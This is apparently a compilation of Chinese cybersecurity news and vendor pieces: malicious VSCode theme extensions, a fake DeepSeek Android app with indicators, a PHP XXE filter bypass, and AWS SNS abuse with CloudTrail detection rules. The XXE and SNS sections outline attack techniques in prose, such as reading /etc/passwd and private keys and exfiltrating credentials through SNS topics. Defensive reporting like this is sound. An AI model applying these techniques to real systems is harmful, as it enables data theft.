lashpoint 的最新情报报告清晰地揭示了持续升级的网络威胁态势,着重指出了泄露凭证和恶意软件感染数量惊人增长的情况。 在 2024 年,威胁行为者成功窃取了数量前所未有的 32 亿个登录凭证,相较于上一年增长了 33%。这一惊人数字突出表明,网络犯罪分子愈发依赖被盗数据来开展勒索软件攻击、数据泄露等恶意活动。 信息窃取者的崛起 在这些被盗凭证中,相当大的一部分(约 21 亿)源自信息窃取恶意软件,也就是通常所说的信息窃取者。 这些恶意工具已然成为勒索软件和数据泄露等高影响网络威胁的主要传播途径。它们操作简单、效果显著且运营成本低,这使得信息窃取者成为网络威胁的前沿力量,全球有超过 2300 万台设备受到感染。信息窃取者数量的急剧增长,凸显出组织机构必须强化安全措施,以抵御这些不断演变的威胁。 漏洞数量的持续增加,让威胁形势变得更为复杂。2024 年,Flashpoint 发现了 37,302 个漏洞,其中超过 39% 的漏洞存在公开的漏洞利用代码。 这使得威胁行为者能够利用这些弱点,获取对系统的未经授权访问。随着攻击面不断扩大,安全团队在进行漏洞管理时,必须依据漏洞的可利用性,而非仅仅依据其严重性来确定优先级。 勒索软件和数据泄露不断增加 这些被泄露的凭证以及漏洞所产生的后果,在勒索软件攻击和数据泄露事件的激增中清晰显现。2024 年,所有行业的勒索软件攻击数量又增长了 10%,而上一年的增长率为 84%。值得关注的是,五个最为活跃的勒索软件即服务(RaaS)组织,占已报告攻击总数的 47% 以上。 此外,数据泄露事件较上一年增长了约 6%。这些趋势都强调了构建强大的防御和事件响应策略,以降低这些威胁影响的重要性。 随着网络威胁形势持续发展,组织必须采用主动且全面的安全防护方法。《Flashpoint 2025 全球威胁情报报告》对这些新兴威胁提供了关键见解,为领导者和网络安全从业者提供了必要的情报,助力他们强化安全态势,保护关键资产。截至 2025 年,已有超过 2 亿个凭证遭到泄露,加强安全措施的紧迫性达到了前所未有的程度。
微软已从 Visual Studio 市场中移除了两个热门的 VSCode 扩展程序“Material Theme - Free”和“Material Theme Icons - Free”,原因是发现它们包含恶意代码。 这两个扩展程序非常受欢迎,总共被下载了近 900 万次,现在 VSCode 用户会收到安全提醒,提示这两个扩展程序已被自动禁用。 在近期发布的一份报告中,研究人员称他们在这些扩展程序中发现了可疑代码,并将他们的发现报告给了微软。 微软员工在 YCombinator 的 Hacker News 上发帖称:“微软已将这两个扩展从 VS Code 市场移除,并封禁了开发者。” 社区中的一名成员对该扩展程序进行了深入的安全分析,发现了多个表明存在恶意意图的危险信号,微软的安全研究人员确认了这些说法,并发现了更多可疑代码。 VSCode自动删除材料主题扩展 研究人员表示,他们认为恶意代码是在扩展的更新中引入的,这表明要么是通过依赖项进行的供应链攻击,要么是开发者的账户遭到了破坏。 扫描仪对材料主题的风险评估 此外,他们解释说,主题应该是静态JSON文件,不执行任何代码,所以这种行为在他们的评估中被标记为可疑。此说法也得到了证实,主题中的“release-notes.js”文件包含严重混淆的JavaScript,这在开源软件中是一个危险信号。 在release-notes.js文件中严重混淆了JavaScript 代码的部分解混淆显示了大量对用户名和密码的引用。微软表示,他们将很快在VSMarketplace GitHub存储库中发布有关该扩展和任何检测到的恶意活动的更多细节。 扩展的开发人员回应了关于扩展是恶意的担忧,指出这些问题是由过时的Sanity引起的。IO依赖项“看起来受到了损害”。 在情况清除并确定扩展是否恶意之前,建议从所有项目中删除以下扩展: ·equinusocio.moxer-theme ·equinusocio.vsc-material-theme ·equinusocio.vsc-material-theme-icons ·equinusocio.vsc-community-material-theme ·equinusocio.moxer-icons 开发人员后来发布了一个他们声称是“完全重写的扩展”,没有任何名为“Fanny Themes”的VSCode市场依赖,微软随后将其删除。
最近,一种伪装成 DeepSeek AI 应用程序的 Android 恶意软件出现,构成了严重的网络安全威胁。 该恶意软件旨在诱使用户下载 DeepSeek 应用程序的虚假版本,进而通过窃取登录凭据等敏感信息,危害用户设备的安全。 恶意软件传播和安装 该恶意软件通过网络钓鱼链接传播,如 hxxps://deepsekk [.] sbs,这些链接会引导用户下载以哈希值命名的恶意 APK 文件 DeepSeek.apk(哈希值为 e1ff086b629ce744a7c8dbe6f3db0f68)。 下载页面 一旦安装,该应用程序会与真正的 DeepSeek 图标一同出现在设备的应用程序抽屉中,致使用户难以将其与合法版本区分开来。 启动虚假应用程序后,系统会提示用户进行更新,而这一操作需要用户启用 “允许来自此来源” 选项,并安装附加应用程序。这一过程会导致设备上安装两个恶意软件实例,且每个实例都有不同的软件包名称,分别为 com.hello.world 和 com.vgsupervision_kit291。 技术分析和影响 该恶意应用程序采用了先进的规避技术,其中包括对 APK 文件进行密码保护,这使得使用 APKTool 和 Jadx 等标准工具进行分析变得极为复杂。不过,Android SDK 工具 aapt 能够成功解析该应用程序。 名为 com.vgsupervision_kit29 的儿童应用程序,频繁提示用户启用辅助服务,以获取在设备上提升权限的许可。 儿童应用安装过程 根据 K7 安全实验室的报告,该应用程序运用域生成算法(DGA)进行命令和控制(C2)通信,这使得跟踪和阻止其活动变得更加困难。 该恶意软件会扫描设备中已安装的应用程序,并将这些信息传输至 C2 服务器,进一步侵犯用户隐私。 为防范此类威胁,建议用户仅从 Google Play 和 App Store 等信誉良好的平台下载应用程序,并及时使用最新的安全补丁更新设备。此外,利用信誉良好的移动安全产品,如 K7 Mobile Security,也有助于检测和防范这些类型的恶意软件攻击。
今年央视“3·15晚会”揭露了黑灰产业利用技术外衣非法攫取个人隐私的系列事件。从披着合法外衣的“电子签高利贷陷阱”,到利用AI技术全天候骚扰用户的黑色产业链,个人信息主权正面临前所未有的挑战。 晚会曝光的案例中,借贷宝、人人信等平台以合法协议为幌子,实则通过虚增债务、虚假账号和人脸识别绕过等手段进行牟利,致使借款人陷入维权无门的困境;某些所谓“大数据获客”企业以爬虫技术为工具,肆意扫描短视频平台评论区,抓取用户手机号、社交账号等敏感信息,甚至通过三网通信数据对用户进行超3800项标签分类。近日的百度副总裁之女“开盒”事件更是引发轩然大波,未成年人通过海外“社工库”群组,仅需300元即可精准获取他人户籍、开房记录等敏感信息。 这些看似独立的违法行为,实则环环相扣:信息窃取方将非法获取的数据输送给外呼公司,后者通过虚拟运营商“小号”和AI机器人,以高度拟人化的话术对用户进行全天候骚扰。一条涵盖数据爬取、倒卖、营销的黑色链条已然成熟,这种“规模化作案”折射出黑灰产业的猖獗与隐蔽性。 针对晚会曝光的智能骚扰、虚商实名漏洞等问题,工信部与多地通信管理局迅速行动,关停涉事线路、核查数据流向,并督促平台清理违法外呼软件。国家层面正通过执法强化与行业协同,构建隐私保护的全链条防线。政策监管是合规底线,企业与“个人信息处理者”的主动合规才是关键。 作为移动安全领域的守护者,梆梆安全深知,隐私保护不是选择题,而是企业的生命线。基于《个人信息保护法》与行业实践,梆梆安全建议企业应高度关注以下几点,筑牢数据安全屏障: 1.最小必要,从源头扼制过度收集 “强制索权”乱象根源在于企业对“最小必要”原则的漠视。通过动态检测技术,确保仅收集与业务直接相关的信息,杜绝“健康类APP读取通讯录”等违规行为。 2.透明化告知,重建用户知情权 模糊的隐私政策与“被同意”陷阱正在侵蚀用户信任。建议以简明语言披露数据用途、第三方SDK清单,并通过可视化界面让用户真正掌控选择权。 3.严控第三方风险,筑牢数据防火墙 第三方SDK是隐私泄露的重灾区。须严格审核合作方资质,明确数据共享边界,并在隐私政策中披露全链路责任主体,实现风险可追溯。 4.高效响应用户权利,拒绝“注销难”顽疾 用户“查、删、改”诉求常被拖延推诿。建议企业搭建自动化响应系统,确保15个工作日内处理数据请求,并提供一键撤回授权、注销账户等便捷功能。 5.终结非必要自启动,让隐私“退场即安全” 频繁自启动不仅消耗资源,更可能窃取隐私。可通过行为监测技术,识别并拦截非业务必需的关联启动,确保用户退出即终止服务。 从315曝光的黑色产业链,到全民参与的“反开盒”行动,隐私安全已从技术议题升维为社会共识。梆梆安全依托多年技术沉淀,以为“自动化检测+人工审查”形式,根据企业用户业务场景,提供从合规检测、风险评估到整改落地的个人信息隐私合规评估及咨询服务。未来,梆梆安全将持续与政府、行业及用户携手,以技术为盾、以责任为锚,共同捍卫个人信息安全主权。
数智时代发展瞬息万变。把握新趋势、防范新风险、迎接新变革,将成为2025年各行各业的愿景与使命。《网络安全和信息化》杂志和IT运维网联合推出“一年一等待——2024企业数智化转型实践成果”,面向新型信息基础设施、数字安全、IT运维、人工智能四大领域,围绕产业观察、产业趋势、厂商解决方案和案例,汇集成册,推荐给广大行业企业用户。 趋势洞察 鸿蒙应用安全新纪元:移动应用加固技术发展趋势洞察 作者: 北京梆梆安全科技有限公司CTO 陈彪 鸿蒙系统作为国产操作系统的代表,正以迅猛之势拓展其市场版图,构建起庞大的应用生态。随着应用数量的爆发式增长,移动应用安全成为鸿蒙系统不容忽视的关键环节。在网络安全形势日益严峻的当下,未加固的应用极易成为黑客攻击目标。恶意分子可轻易篡改应用代码,植入恶意程序,窃取用户的账号密码、支付信息等重要数据,这不仅会让用户遭受经济损失,还严重侵犯个人隐私。市场分析表明,未来,移动应用安全将更加注重代码加固、运行环境检测以及动态防护能力的提升。这一趋势不仅反映了市场对应用安全的高度重视,也为安全产品的技术演进指明了方向。 鸿蒙移动应用安全问题 1.HarmonyOS全球第三大智能操作系统 2024年6月21日,华为召开开发者大会(HDC.2024),发布全场景智能操作系统HarmonyOS NEXT Bate版。该系统版本采用全新鸿蒙内核,系统性能全方位优化提升,相比HarmonyOS性能提升30%,同时功耗下降了20% 。鸿蒙生态设备数量已超过9亿,开发者人数超过254万,包括淘宝、支付宝、美团、银联、建设银行、招商银行等超过5000款主流应用加入鸿蒙原生应用生态。 2.鸿蒙应用面临的安全风险在快速上升 尽管鸿蒙应用的发布有着严格审核、上架流程,并且只能在华为商店内下载和安装。但随着鸿蒙系统的高速发展,鸿蒙应用承载了越来越多的各种业务,大量开发者和用户加入鸿蒙生态,这也将导致针对鸿蒙应用的黑客攻击越来越多。仅仅依靠华为的上架审核,鸿蒙应用开发企业将面临较高的核心代码泄露、知识产权泄漏等安全风险。 3.移动应用的强监管 随着近几年国家对网络安全的重视,从国家部门到行业监管机构,以及企业内部的信息安全部门,都建立了移动应用安全的各类检查、测评方法,开发者需要通过相关的应用安全测评,才能进行市场发布。包括鸿蒙、Android、iOS等移动应用都在监管审查范围内。而随着应用开发者需要支持更多操作系统的移动应用开发,他们也更加没有时间、精力、技术去解决移动应用安全建设的问题。例如,移动应用需要具备防止代码被逆向破解、防止基于调试工具的内存调试;代码内的明文字符串信息需要加密隐藏保护,数据文件不能够被非法读取和篡改;TS代码文件需要加密保护;SO代码文件需要加密保护;移动应用需要具备防界面截屏录屏保护等。 4.鸿蒙应用的常见安全问题 敏感信息泄露。鸿蒙应用敏感信息泄露漏洞可能因权限管理不当、数据传输不安全或应用内部漏洞而导致用户隐私数据被窃取。攻击者利用这些漏洞,可以获取用户的地理位置、通讯录、短信等敏感信息,进而造成用户财产损失和隐私泄露。使用App的敏感数据包括但不限于口令、密钥、证书、会话标识、License、隐私数据(如短消息的内容)、授权凭据、个人数据(如姓名、住址、电话等)等,在程序文件、配置文件、日志文件、备份文件及数据库中都有可能包含敏感数据。 明文传输核心业务数据泄漏。鸿蒙NEXT应用在某些情况下可能存在明文传输核心业务数据的安全漏洞,这意味着敏感数据(如用户个人信息、交易记录等)在传输过程中未进行加密处理,容易被第三方截获和滥用。此漏洞一旦被恶意攻击者利用,将严重威胁用户的数据安全和隐私保护,可能导致用户敏感信息泄露、财产损失等严重后果,同时,也可能对鸿蒙NEXT应用及华为的品牌声誉造成负面影响。 篡改及二次打包漏洞。鸿蒙NEXT应用面临的篡改及二次打包漏洞指的是恶意攻击者对应用进行逆向工程,修改其代码或资源,然后重新打包并分发,可能导致恶意功能被植入应用中。这种漏洞会破坏应用的完整性,使得用户可能在不知情的情况下下载并安装了被篡改的版本,从而面临隐私泄露、数据损坏或安全攻击的风险。 输入及传输数据泄露风险。鸿蒙NEXT应用在处理输入数据时,如果未对键盘输入进行安全防护,可能会面临键盘记录器等恶意软件的威胁,导致敏感信息如密码和个人信息被非法抓取和分析。传输数据泄漏风险指的是应用在传输过程中如果没有采用加密措施,攻击者可能通过中间人攻击等手段截获、监听和篡改应用的通信数据,造成数据泄露或被恶意利用。 鸿蒙移动应用安全建设 梆梆安全作为率先与华为开展鸿蒙NEXT应用新鸿蒙应用加固技术研发的安全厂商,支持为鸿蒙应用提供ArkTS、标准TS、C/C++、SO等代码的深度混淆加固保护及运行环境风险识别和阻断能力,防止核心代码泄露,保护鸿蒙NEXT应用安全。 梆梆安全鸿蒙应用加固产品,是基于梆梆安全“源到源”加固保护技术自主研发的全新鸿蒙应用加固产品,专门为HarmonyOS NEXT App提供全面的代码防逆向、防分析、防窃取等安全保护服务,充分保护企业开发新鸿蒙应用的核心代码安全。主要保护效果和价值如下: 1.ArkTS代码加固保护 通过核心算法对ArkTS代码进行控制流混淆、虚假控制流、字符串加密、表达式混淆、常量混淆、变量混淆、多样化混淆等安全加固处理,提供全方位保护,极大提升ArkTS代码对抗静态逆向破解能力,让被逆向的代码无法被理解。 2.C/C++代码加固保护 通过核心算法对C/C++代码进行控制流平坦化混淆、基本块切割、不透明谓词、伪造控制流、字符串加密、指令替换、多样化混淆等安全加固处理,提供全方位保护,极大提升C/C++代码对抗静态逆向破解能力,让被逆向的代码无法被理解。 3.SO文件加固保护 为SO二进制文件提供加壳保护能力,保护鸿蒙应用软件核心知识产权安全。 4.运行环境安全保护 为鸿蒙NEXT应用提供运行环境风险检测识别能力,可以防止在不安全的OpenHarmony系统、模拟器等环境中运行,防止被动态调试分析、截屏录屏、屏幕共享、网络代理等攻击行为,全面保障应用运行时的安全。 结语 随着鸿蒙系统的不断演进,梆梆安全应用加固技术也在持续创新。通过代码加固、安全SDK能力开发及实时检测&监测技术的精进,深度适配鸿蒙各版本系列手机,确保应用安全性与兼容性。这一趋势不仅提升了鸿蒙应用的安全防线,也满足了华为应用商店的严格审核标准,为鸿蒙生态的安全未来奠定了坚实基础。
#全民AI监督计划#自启动以来,迅速在全国掀起了一股AI反诈热潮。美亚鉴真平台小程序已陆续接入新疆、河北、甘肃等多个省级政务平台,并在北京、上海、广州等地加速推进,全力协助全民识别AI虚假信息! 与此同时,美亚鉴真平台小程序也赢得了各地反诈中心和公安机关的广泛推荐。本期专题,昆明反电信网络诈骗中心为您分享“五个方法远离AI诈骗!” 秘诀一:别被“熟人”AI克隆骗了! 以前,骗子假冒客服,现在,骗子直接假冒你认识的人! AI语音克隆:只需要几秒钟录音,AI就能模仿你的亲朋好友,说话语气、声音完全一样! AI换脸视频:你以为自己在和朋友视频聊天?其实是骗子用AI换脸技术,把别人的嘴形调整成“对口型”! 冒充领导、家人:“我出事了,快打钱!” 这类骗局已经升级,骗子甚至能合成你“家人”的声音,让你深信不疑! 防骗秘籍: 视频通话时,让对方做出指定动作(比如眨眼三次、摸摸鼻子),AI暂时还无法做到实时模仿! 语音来电,一定要用其它方法跟对方再核实一次,尤其是涉及转账、汇款的内容! 秘诀二:别信“官方来电”,AI能模拟一切! “你好,这里是XX银行,你的账户涉嫌洗钱,请立即配合调查!” “我是XX公安局,涉及案件,请立即转账到安全账户!” “这里是社保局,你的社保卡异常,即将冻结!” 过去,骗子靠换号软件伪造来电显示,现在更离谱了——AI可以模拟官方客服、银行工作人员的声音,甚至合成权威机构的通知视频,让你误以为是真的! 防骗秘籍: 凡是提到“转账、冻结账户、资金核查”的,一律挂断! 银行、警方绝不会通过电话、短信要求转账!有疑问,拨打官方客服电话核实! 秘诀三:AI生成的“证据”,全是假货! 冒充官方通知:AI伪造“XX银行公告”,看上去跟真的一模一样! 假聊天记录:伪造“某领导要求打款”的微信聊天截图,骗财务人员转账! 假转账截图:AI合成“已付款”截图,骗你发货、提供服务,但其实你一分钱都没收到! 防骗秘籍: 银行流水和交易记录,只信官方APP,不信截图! 重要文件、合同,一定要电话或线下确认,不要只看聊天记录! 秘诀四:刷单、投资、客服退款,全是AI骗局! AI智能“客服”:你以为你在跟京东、淘宝客服聊天?其实背后是骗子用AI模拟的对话! AI投资导师:AI生成虚假“稳赚不赔”收益截图,诱导你投资,最终血本无归! AI合成“中奖信息”:AI伪造短信、邮件、网站,骗你点开钓鱼链接! 防骗秘籍: 刷单、刷信誉,100%是诈骗! 投资理财只信正规机构,不要听“专家”瞎忽悠! 不要点击陌生链接,尤其是涉及登录、付款的页面! 秘诀五:用科技拆穿谣言! 既然AI能造假,那我们就让AI来打假!重点推荐“美亚鉴真平台”小程序,可以针对深度伪造AI换脸、视频换脸、生成图片视频等进行鉴别。 AI再强,骗不到冷静的你! 特别提醒: 不要轻信“熟人”来电、语音、视频,AI克隆无孔不入! 官方来电?查查号码,核实信息,别急着转账! 截图、合同、付款记录?AI能伪造一切,只信官方数据! 投资、刷单、退款客服?99%是骗局,别给骗子送钱! 冷静是最强的反诈武器,不信、不慌、不转账!
#全民AI监督计划#自启动以来,迅速在全国掀起了一股AI反诈热潮。美亚鉴真平台小程序已陆续接入新疆、河北、甘肃等多个省级政务平台,并在北京、上海、广州等地加速推进,全力协助全民识别AI虚假信息! 与此同时,美亚鉴真平台小程序也赢得了各地反诈中心和公安机关的广泛推荐。近日,贵港公安放大招了!“美亚鉴真平台”微信小程序上线“贵港警事”微信公众号,帮你轻松识破骗子的AI换脸、伪造视频! 操作步骤 用科技拆穿谣言! ① 微信搜索 “贵港警事” → 点击关注 ② 底部菜单戳 “反诈业务” → 选“鉴真平台” ③ 上传疑似伪造的视频/图片(MP4/JPG等都能验) ④ 即时出结果! 为什么推荐? 骗子套路再升级,咱有科技来破局! ✔ 由央企控股子公司国投智能打造,公安官方技术背书,可靠! ✔ 操作0门槛,爸妈都能轻松用,一键生成检测结果。 ✔ 支持30种图像算法、40种视频合成技术的检测,覆盖主流AI生成内容!遇到可疑转账视频、网图谣言…直接验! ✔ 快速精准:秒级响应,准确率90%以上! AI再强,骗不到冷静的你! 特别提醒: 🔹 不要轻信“熟人”来电、语音、视频,AI克隆无孔不入! 🔹 官方来电?查查号码,核实信息,别急着转账! 🔹 截图、合同、付款记录?AI能伪造一切,只信官方数据! 🔹 投资、刷单、退款客服?99%是骗局,别给骗子送钱! 🔹 冷静是最强的反诈武器,不信、不慌、不转账! 🔹 遇到高额转账、熟人借钱视频,先鉴真再行动!
近日,国家互联网信息办公室联合工业和信息化部、公安部、国家广播电视总局发布《人工智能生成合成内容标识办法》(以下简称《标识办法》),自2025年9月1日起施行。国投智能参与了《标识办法》和《标识办法》相配套的国家强制标准GB 45438-2025《网络安全技术人工智能生成合成内容标识方法》的起草工作。点击阅读原文查看《标识办法》详情 专家观点: 国投集团特级专家、国投智能人工智能研究院院长 赵建强博士: 《标识办法》聚焦人工智能“生成合成内容标识”关键点,与《互联网信息服务深度合成管理规定》《生成式人工智能服务管理暂行办法》一脉相承,是这些规范性文件中标识有关要求的进一步细化和具体实施规范。《标识办法》将推动由生成到传播各环节的全流程安全管理,力争打造可信赖的人工智能技术。通过清晰的定义标识,明确相关服务主体的标识责任义务,规范内容制作、传播各环节标识行为,提醒用户辨别虚假信息,以合理成本提高安全性,促进人工智能在文本对话、内容制作、辅助设计等各应用场景加快落地,同时减轻人工智能生成合成技术滥用危害,防范利用人工智能技术制作传播虚假信息等⻛险行为,推动人工智能健康有序发展。 《标识办法》和对应的国家强制标准的出台是我国推进人工智能领域安全治理、促进产业规范健康发展、引导技术向善的重要举措,是保障人工智能技术安全有序发展的关键手段,《标识办法》明确了人工智能技术参与各方的主体责任和义务,具有很强的可操作性。公众能够清晰辨别人工智能合成生成的内容,降低利用生成合成内容传播虚假信息、实施电信诈骗等风险。 《标识办法》能否很好的落地实施,需要参与各方的密切协同配合,生成合成内容标识合规或将成为相关业务主管部门依法开展常态化人工智能治理监督检查的重点领域。 《标识办法》的出台和落地,将会带来对监督检查和深度生成合成内容检测识别需求的增⻓,促进国投智能人工智能安全领域技术的推广应用。作为网络空间安全与社会治理领域国家队,国投智能依托在深度合成和生成式AI技术领域的深厚积累,推出美亚鉴真系列产品守护人民安全。 首发国内第一款深伪视频图像鉴真智能装备——慧眼视频图像鉴真工作站,集成了先进的AI算法和图像处理技术,能够高效识别并验证视频图像的真实性,为司法调查、内容真实性验证等领域提供了强有力的技术保障。互联网上线“美亚鉴真平台”微信小程序,对深度合成的视频图像、及大模型生成的音视频图像和文本内容进行检测识别,将AI鉴真技术普及至大众层面,用户只需通过手机即可快速获取鉴定结果,有效提升了公众的信息甄别能力。 目前,美亚鉴真平台小程序已陆续接入新疆、河北、甘肃等多个省级政务平台,并在北京、上海、广州等地加速推进,全力协助全民识别AI虚假信息! 国投智能滕达董事长强调,在推动AI技术创新的同时,必须警惕其可能带来的风险与挑战。因此,国投智能在加强人工智能安全治理技术体系研究的同时,也将继续聚焦大模型技术应用、生成式人工智能和人工智能安全三个核心方向,不断推出更为安全、可信、可靠的人工智能技术产品,为打击利用人工智能的新型涉网犯罪提供有力支持,为维护和保障人工智能规范健康发展贡献力量。
Web 应用程序安全研究员 Aleksandr Zhurnakov 详细揭示了 PHP 中新发现的 XML 外部实体(XXE)注入漏洞。该漏洞展示了攻击者如何绕过多种安全机制,进而访问敏感配置文件和私钥,凸显了即便在看似安全的实现中,不当的 XML 解析配置也存在巨大风险。 此漏洞利用了 PHP 的 libxml 扩展及其包装器的组合,使攻击者能够绕过诸如 LIBXML_NONET、LIBXML_DTDLOAD 等限制标志以及其他标志。这些标志原本的作用是防止加载外部实体或访问外部资源,然而研究显示,攻击者可借助高级有效载荷和技术规避它们。 绕过安全机制 该漏洞源于 PHP 通过 DOMDocument 类处理 XML 解析的方式。默认状态下,外部实体加载处于禁用状态,但像 LIBXML_DTDLOAD 这样的特定标志,却允许攻击者加载恶意 DTD 文件。随后,攻击者可利用 php://filter 等 PHP 包装器制作这些文件,以窃取诸如 /etc/passwd 或私钥等数据。 攻击者绕过安全机制的关键手段之一,是使用诸如 http:// 等替代包装器替换 php://filter/resource=URL,从而有效地绕过 LIBXML_NONET 限制。 入站 HTTP 请求 此外,通过滥用参数实体(% name;),攻击者能够在应用安全检查之前,将恶意内容注入 XML 结构中。更为复杂的是,研究表明,攻击者可利用类似 zlib.deflate 过滤器的 base64 编码来压缩有效载荷,减小其大小,使其能够符合 GET 参数或查询字符串的常见服务器约束。 根据 PT Swarm 报告,当服务器上的出站 TCP 连接被阻止时,这种方法还能借助 DNS 子域实现渗透。 影响 该漏洞已在特定应用程序中被发现。例如,SimpleSAMLphp(CVE-2024-52596)中的 XXE 漏洞,允许未经身份验证的用户读取配置文件、提取私钥并伪造身份验证断言。 有效的 xxe 载荷 当 SimpleSAMLphp 被配置为身份提供者时,攻击者实际上能够完全绕过身份验证机制。 Zhurnakov 的研究着重强调了 PHP 应用程序中安全 XML 解析实践的重要性。建议开发人员禁用所有不必要的 libxml 标志(如 LIBXML_DTDLOAD、LIBXML_NOENT 等),并确保部署具有增强 XXE 保护的最新 PHP 版本(例如 PHP 8.4 中引入的相关保护机制)。此漏洞清晰地警示我们,看似微不足道的错误配置,也可能引发复杂的攻击途径,凸显了在 Web 应用程序开发中进行严格测试和遵循安全编码实践的必要性。
Amazon Web Services 的简单通知服务(AWS SNS),是一种功能多样的基于云的发布 / 订阅服务,在促进应用程序与用户间沟通方面发挥着重要作用。凭借可扩展性与集成能力,它成为众多组织的得力工具。然而,部分不法分子将其滥用,用于数据泄露、网络钓鱼等恶意活动,由此引发了一系列严重的安全问题。本文将深入剖析 AWS SNS 被利用的机制,探讨现实中滥用的场景,并提供切实可行的检测与预防策略,助力组织深入了解 SNS 配置中潜藏的漏洞,借助有效的检测手段,降低风险,强化云安全防护态势。 AWS SNS:一把双刃剑 AWS 简单通知服务(SNS)作为基于云的发布 / 订阅通信服务,允许用户通过电子邮件、短信、移动推送通知等多种端点,向订阅者发送通知。它主要基于应用程序到人(A2P)和应用程序到应用程序(A2A)这两种工作流程运行。 其中,A2P 工作流虽旨在与 Lambda 和 SQS 等 AWS 服务实现无缝集成,但一旦配置失误,便极有可能沦为被滥用的途径。 SNS 具备过滤策略、服务器端加密(SSE)、传送重试和死信队列(DLQ)等功能,这些功能在增强其性能的同时,也可能被不法分子利用。SNS 强大的可扩展性,能够在无需人工干预的情况下处理海量消息,为组织节省成本。然而,这种特性也让不法分子有机可乘,他们能够借助该服务开展大规模恶意活动,如发起网络钓鱼活动或实施数据泄露。 尽管 AWS SNS 架构较为稳固,但由于 IAM 角色配置不当、API 操作监控缺失以及日志记录机制存在漏洞等问题,使得 SNS 易遭受滥用。举例来说,不法分子能够利用宽松的 IAM 策略创建主题、订阅外部端点,并在不触发警报的情况下发布敏感数据。同时,某些 API 操作(如失败的发布请求)缺乏透明度,进一步加大了检测难度。 SNS 中的加密机制主要聚焦于利用 AWS 密钥管理服务(KMS)对静态数据进行保护,这确实能够保障个人身份信息(PII)等敏感数据的安全。不过,攻击者可以通过利用数据传输过程中的加密漏洞,或者借助未受监控的端点,绕过这些防护措施。 白盒测试:模拟恶意行为 白盒测试为模拟对抗行为、验证检测能力提供了可控环境。与依赖恶意软件二进制文件的基于端点的模拟不同,以云为核心的白盒测试借助 “脱离云端” 技术,充分利用现有的 API 驱动服务。这种方式对于分析针对 SNS 等 AWS 服务的策略、技术和程序(TTP)尤为有效。 在近期的一次白盒测试中,研究人员模拟了利用 SNS 进行数据泄露的场景,他们创建一个主题,将其作为向外部端点转发被盗凭证的中介。该方法成功绕过了网络 ACL 等传统安全机制,充分表明攻击者能够轻易利用配置错误的基础设施。 数据泄露工作流程 攻击者通常遵循一套系统流程,通过 AWS SNS 窃取敏感数据: · 初始访问:借助攻击易受攻击的 Web 应用程序,或使用被盗凭证等手段,进入 EC2 实例。 · 凭证发现:识别本地文件(如.env 或 GitHub 凭证文件)中存储的敏感信息。 · 主题创建:利用从 IMDSv2 获取的临时凭证创建 SNS 主题。 · 订阅设置:将外部电子邮件地址或手机号码注册为主题的订阅者。 · 数据发布:将敏感数据进行 Base64 编码后,发布到主题进行分发。 通过 AWS SNS 进行数据泄露的可视化工作流程 这一流程充分显示,一旦攻击者获得初始访问权限,实施攻击所需的操作极为简便。通过利用 CLI 命令和 IAM 角色等原生 AWS 服务,不法分子能够将恶意活动混入正常流量模式中。 AWS SNS 滥用最为令人担忧的情形之一,便是其在短信网络钓鱼(SMS 网络钓鱼)活动中的应用。 SentinelOne 的研究发现,部分攻击者利用基于 Python 的工具(如 SNS Sender),通过泄露的 AWS 凭证大规模发送欺诈性消息。这些活动借助经过身份验证的 API 请求绕过安全措施,发送假冒可信实体的网络钓鱼消息。 此类活动的得逞,取决于攻击者在 AWS 最终用户消息传递服务中获取生产级消息传递权限的能力。这需要监管机构对发起身份的批准以及运营商对大容量短信的预先批准,而经验丰富的攻击者能够通过入侵已有权限的账户来突破这一障碍。 尽管滥用 AWS SNS 为攻击者带来诸多便利(如混入合法流量、绕过出口监控),但也存在一定挑战: · 初始访问:需要利用 EC2 实例中的漏洞,或通过社会工程手段获取凭证。 · 会话持久性:要在强大的端点保护中维持活动会话。 · 基础设施设置:需使用适用于 SNS 操作的宽松策略配置 IAM 角色。 · 沙盒限制:需克服 AWS 对处于 SMS 沙盒模式的新账户施加的限制。 这些挑战凸显了主动安全措施的重要性,例如强化 IAM 策略,以及监控 CloudTrail 日志中的异常情况。 CloudTrail 审计日志与检测规则 CloudTrail 审计日志是检测与 SNS 滥用相关异常 API 操作的关键资源。安全团队通过关注附加到 EC2 实例的假定角色,能够识别出异常情况,比如罕见的主题创建或订阅事件。利用 Elastic 的新条款逻辑,可以制定如下检测规则,用于标记首次出现的可疑活动: · 稀有用户创建主题:识别假定角色意外创建 SNS 主题的情况。 · 使用外部电子邮件订阅:监控指定外部端点的订阅行为。 · 消息发布高峰:检测直接电话消息传递活动的突然增加。 用于凭证检查的 Bash 命令输出 这些规则帮助组织精准定位潜在的滥用场景,同时通过上下文分析最大程度减少误报。 威胁搜寻查询 威胁搜寻查询通过解析 CloudTrail 日志中的特定属性(如用户代理字符串或请求参数),能更深入洞察潜在危害。例如: · 罕见主题创建:根据 EC2 实例 ID 和区域聚合数据,识别异常活动。 · 电子邮件订阅:按协议类型过滤订阅,检测未经授权的外部端点。 · 直接消息峰值:跟踪请求参数中带有电话号码的发布操作,揭露短信网络钓鱼活动。 这些查询助力安全团队依据异常信号确定调查优先级,同时随着时间推移不断完善检测逻辑。 AWS SNS 作为强大的通信工具,为组织带来诸多便利,但若缺乏监控或配置不当,便会潜藏巨大风险。上述研究揭示了不法分子如何利用其功能实施数据泄露、网络钓鱼等恶意活动。组织通过了解这些漏洞,借助 CloudTrail 日志和威胁搜寻查询实施有力的检测策略,能够有效降低风险。主要建议如下: · 运用最小特权原则(PoLP)强化 IAM 策略。 · 在 CloudTrail 和 CloudWatch 中启用全面的日志记录机制。 · 制定契合组织环境的异常检测规则。 · 定期开展白盒测试,验证安全控制效果。 随着云环境持续演进,主动监控新兴威胁,对于维持强大的安全态势、防范 AWS SNS 等服务遭受恶意滥用至关重要。
